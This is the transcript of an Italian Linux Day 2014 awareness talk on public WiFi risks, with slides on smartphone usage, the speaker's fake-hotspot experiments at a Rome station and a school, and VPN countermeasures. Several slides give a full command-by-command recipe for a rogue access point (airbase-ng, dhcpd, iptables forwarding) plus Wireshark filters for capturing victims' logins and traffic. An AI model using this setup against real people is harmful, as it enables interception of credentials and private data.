System is processing data
Please download to view
...

BackBox: WiFi Libero? Ti spio!

by andrea-draghetti

on

Report

Category:

Internet

Download: 0

Comment: 0

2,848

views

Comments

Description

Al Linux Day 2014 di Imola ho parlato di Smartphone e Tablet che trainano le vendite del settore informatico degli ultimi anni, gli utenti inconsci della propria sicurezza si collegano incautamente a reti WiFi sconosciute mettendo a rischio le proprie informazioni personali. Una dimostrazione pratica permetterà di sensibilizzare l'utente medio e rivelerà ai più esperti come creare un finto Access Point con la distribuzione BackBox Linux.
Download BackBox: WiFi Libero? Ti spio!

Transcript

  • 1. BackBox: WiFi Libero? Ti spio!Andrea Draghetti - @AndreaDraghettiLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 2. AgendaBackBox Linux – Penetration Testing DistributionWiFi Libero? Ti spio! (Lo facciamo davvero....)Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 3. BackBox LinuxBackBox è una distribuzione GNU/Linux derivata da Ubuntunata nel 2010 per volontà di Raffaele Forte, progettata pereseguire Penetration Test e Security Assessment fornisceun insieme di strumenti che facilitano l'analisi di reti e sistemiinformatici. Essa integra in un ambiente desktop gli strumentinecessari ad un ethical hacker per eseguire test di sicurezza.Recentemente offre supporto anche per l'InformaticaForense e la Mobile Analysis!BackBox è Open Source e Free!Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 4. BackBox ScreenLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 5. Top 100 DistroLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 6. BackBox LinkSito ufficiale: www.backbox.orgWiki: wiki.backbox.orgForum: forum.backbox.orgFacebook Group: www.facebook.com/groups/backboxMirror Garr: http://mirror3.mirror.garr.it/mirrors/backbox/Mirror OS: http://backbox.oversecurity.net/downloads/Repository: https://launchpad.net/~backboxLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 7. Un Caso RealeSempre più connessi...Foto: XcelusLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 8. Smartphone nel MondoFonte: Il Sole 24 OreLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 9. Smartphone in ItaliaLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 10. WiFi finalmente liberoIl 23 Luglio 2013 è stato definitivamente approvato l’emendamento che liberalizzale reti WiFi in Italia.Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 11. Smartphone e WiFi ItalianoFonte: Cisco – Febbraio '14Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 12. WiFi Libero e Utilizzo all'esteroEcco i principali risultati emersi dalla ricerca condotta negli UK:● Il 31% del campione accede almeno una volta alla settimana a servizi Wi-Fipubblici per consultare dati aziendali confidenziali, e in media, gli intervistati sicollegano 15 volte a settimana a reti Wi-Fi aperte e poco sicure● Il 52% dei pendolari teme che i propri dati possano essere intercettati duranteil collegamento a una rete Wi-Fi pubblica ma, ciò nonostante, continuacomunque ad utilizzarla● La metà degli intervistati vive come una frustrazione l’indisponibilità di retiWi-Fi, a dimostrazione di come gli utenti ormai percepiscano questo serviziocome indispensabile nella vita di tutti i giorni● Il 20% dei dispositivi mobili non ha sistemi di sicurezza attivati, neppure unapassword o un codice PIN, e solo il 5% ha adottato policy di sicurezza corporateFonte: GFI Software™Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 13. WiFi Libero e Utilizzo ItalianoHo fatto una simulazione, con una Internet Key WiFi, alla StazioneTermini di Roma a Settembre 2013!SSID WiFi: „Free WiFi Termini“Utenti collegati contemporaneamente: 7Utenti totali: ~16Durata Test: ~1hLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 14. WiFi Libero e Utilizzo ItalianoLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 15. Incauto CollegamentoRisultato:16 persone in circa un ora si sono collegate ad una rete WiFisconosciuta, attratte dal plausibile nome di rete!16utenti : 1h = Xutenti : 24hIn una giornata il mio Access Point poteva raggiungere 384utenti con un segnale che copre circa 7mt!Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 16. Eh ma nel 2014?!Il primo test l'ho contodotto un anno fa!Per essere sicuro l'ho ripetuto in un luogopubblico lo scorso 20 Ottobre nell'orariodi punta...Utenti collegati contemporaneamente: 5Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014Utenti totali: ~7Durata Test: ~7minuti7utenti : 7minuti = Xutenti : 60minuti60utenti/h
  • 17. Ero tra voi...Il test l'ho condotto all'Istituto Tecnico Alberghetti alle 7:40 prima dell'ingresso nelle aule!SSID WiFi: „Free WiFi Alberghetti“Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 18. Ethical HackingSe le mie intenzioni non fossero state pacifiche?Cosa potevo ottenere dagli utenti collegati al WiFi?Sfruttando un Access Point piùpotente/professionale?Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 19. Fake Access PointCreando un finto Access Point garantisco agli utenti dicollegarsi ad internet e senza che loro si accorgano di nullaposso intercettare/sniffare tutto il traffico che generano.Otterrò:Cronologia di navigazione, eMail, Ricerche, Password, eccLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 20. DimostrazioneNon ci credete?Proviamo assieme!Occorrente:● BackBox Linux● Collegamento a Internet● Adattatore WiFi USB● Server DHCP● Tanta volontà... :)Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 21. Installiamo il DHCP Server$ sudo -s$ apt-get update && apt-get install dhcp3-server$ gedit /etc/dhcpd.conf# Sample /etc/dhcpd.conf# FakeAP by Andrea Draghettidefault-lease-time 600;max-lease-time 7200;option subnet-mask 255.255.255.0;option broadcast-address 192.168.0.255;option routers 192.168.0.1;option domain-name-servers 208.67.222.222; #OpenDNSsubnet 192.168.0.0 netmask 255.255.255.0 {range 192.168.0.10 192.168.0.100;Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014}
  • 22. Prepariamo l'interfaccia di Rete$ sudo -s$ airmon-ng check kill$ ifconfig eth0 down$ ifconfig eth0 192.168.2.105 broadcast 255.255.255.0$ route add default gateway 192.168.2.1$ ifconfig eth0 upeth0 è l'interfaccia di rete collegata ad internet.Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 23. Monitor Mode$ sudo -s$ airmon-ng start wlan0wlan0 è l’attuale interfaccia di rete wireless, se non conoscente la vostra interfacciadi rete wireless digitare il comando: iwconfigLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 24. Fake AP$ sudo -s$ airbase-ng --essid FakeAP -c 6 -v mon0mon0 è interfaccia di rete creata nel passo precedente, ovvero con la funzione diMonitor Mode. Se non ricordate l’interfaccia di rete creata digitare il comando: iwconfigLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 25. NetMask e Subnet(apriamo un nuovo terminale)$ sudo -s$ ifconfig at0 up$ ifconfig at0 192.168.0.1 netmask 255.255.255.0$ route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1at0 è interfaccia di rete creata nel passo precedente, ovvero con la funzione di Fake AP.Se non ricordate l’interfaccia di rete creata digitare il comando: iwconfigLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 26. Start DHCP Server$ sudo -s$ touch /var/run/dhcpd.pid$ chmod 777 /var/run/dhcpd.pid$ dhcpd -d -f -cf /etc/dhcpd.conf at0at0 è interfaccia di rete creata con la procedura di Fake AP. Se non ricordatel’interfaccia di rete creata digitare il comando: iwconfigLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 27. IP Tables(apriamo un nuovo terminale)$ sudo -s$ iptables --flush$ iptables --table nat --flush$ iptables --delete-chain$ iptables --table nat --delete-chain$ echo 1 > /proc/sys/net/ipv4/ip_forward$ iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE$ iptables --append FORWARD --in-interface at0 -j ACCEPT$ iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1eth0 è l’interfaccia di rete realmente collegata ad internetat0 è l’interfaccia del Fake AP192.168.1.1 è il reale gateway, se non lo conoscete digitate il comando: route -nLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 28. WireShark$ sudo -s$ wiresharkVisionare l'interfaccia at0Filtri consigliati:● tcp contains XXX Cerca la parola XXX in tutti i pacchetti TCP● http.request Visualizza tutto il traffico GET e POST● http Visualizza tutto il traffico HTTP● sslLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 29. AneddotiFonte: Paolo AttivissimoLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 30. The FappeningUn incredibile storia di accesso abusivo ai profiliCloud di centinaia di star di Hollywood, econseguente pubblicazione online di Foto eVideo intimi scattate con i loro smartphone!● Selena Gomez● Jennifer Lawrence● Melanie Laurent● Lizzy Caplan● Rihanna (in foto)● Emily Browning● Jenny McCarthy● Avril Lavigne● Jessica Alba● Kaley Cuoco● Lady Gaga● Hillary Duff● ...Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 31. Ipotesi: Fappening & Captive PortalLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014Attraverso un Captive Portal,necessario per accedere aduna rete WiFi in uno o piùeventi cinematografici, hannoindotto i VIP a registrarsi.L'errato utilizzo dellamedesima password perpiù servizi ha permesso agliattaccanti di accedere aiservizi Cloud delle vittime edi sottrare le Foto e Videointimi.
  • 32. ContromisureLa prima regola è DIFFIDATE, sfruttate la vostra offertaInternet!Ma a volte è indispensabile collegarsi ad un Access Pointsconosciuto, possiamo proteggerci?Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 33. VPNUna Virtual Private Network permette di collegare in modo sicuro due estremi di unaconnessione tramite una rete non dedicata, tipicamente utilizzando internet. Si può vedereuna VPN come l'estensione su scala geografica di una rete locale privata che collega traloro terminali dislocati su tutto il territorio sfruttando una rete IP pubblica e realizzando unarete LAN, detta appunto virtuale e privata, logicamente del tutto equivalente ad unainfrastruttura fisica di rete appositamente dedicata.Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 34. Server VPN?È possibile crearsi un proprio Server VPN:Sfruttando DD-WRT, firmware Open Source per il vostro Router, seè compatibile.Implementando pfSense, firewall/router software open sourcebasato su FreeBSD, configurabile su un comune computer.Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 35. Contromisura EstremaBlack Hole Data Bag isola ilproprio dispositivo da qualsiasisegnale 2G, 3G o 4G oltre aisegnali WiFi, Bluetooth e NFC!La vostra privacy è assicurata!Fonte: D3LabLinux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • 36. Domande...?Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group#LinuxDay2014
  • Fly UP